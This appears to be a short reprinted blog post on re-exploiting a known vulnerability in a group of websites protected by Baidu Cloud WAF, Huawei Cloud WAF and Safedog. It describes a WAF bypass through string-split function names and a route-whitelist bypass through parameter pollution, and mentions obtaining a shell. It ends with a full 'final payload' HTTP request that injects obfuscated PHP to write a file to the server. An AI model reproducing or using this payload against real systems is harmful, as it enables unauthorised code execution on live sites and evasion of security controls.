Authorized for reprint, feel free to follow the public account if interested
A vulnerability left by a certain centralized station group last year was found to be intercepted when used this year. Just venting, is this completely crazy? What’s up with Baidu Cloud WAF, Huawei Cloud WAF, and Security Dog all together...
waf bypass
It's relatively simple, just filter out the eval encoding.
Router whitelist restriction bypass
Upon random requests, it was found that there were routing restrictions, only allowing access to specified paths.
However, it’s impossible to hardcode all paths, for example, the search function needs to accept user input. Packet capture confirmed that the search interface can be used normally and will not trigger the routing whitelist restriction.
Therefore, it is speculated that parameter pollution can be used to bypass the restriction, for example:
Insert same name parameter#
/index.php?name=bob&name=rose
The backend may actually receive#
name=rose
After getting a shell, check the code and confirm that this interface matches any content.
Final payload
POST /index.php?c=api&m=essearchlist&s=mmyzj&c=Toup&m=Zj_Post HTTP/2
Host:
Content-Type: application/x-www-form-urlencoded
Content-Length: 147
id='-("fil"."e"._."pu"."t"._."contents")("./kfc2024.php",("base"."64"._."decode")('a2ZjX3ZfbWVfNTA='),FILE_APPEND)-'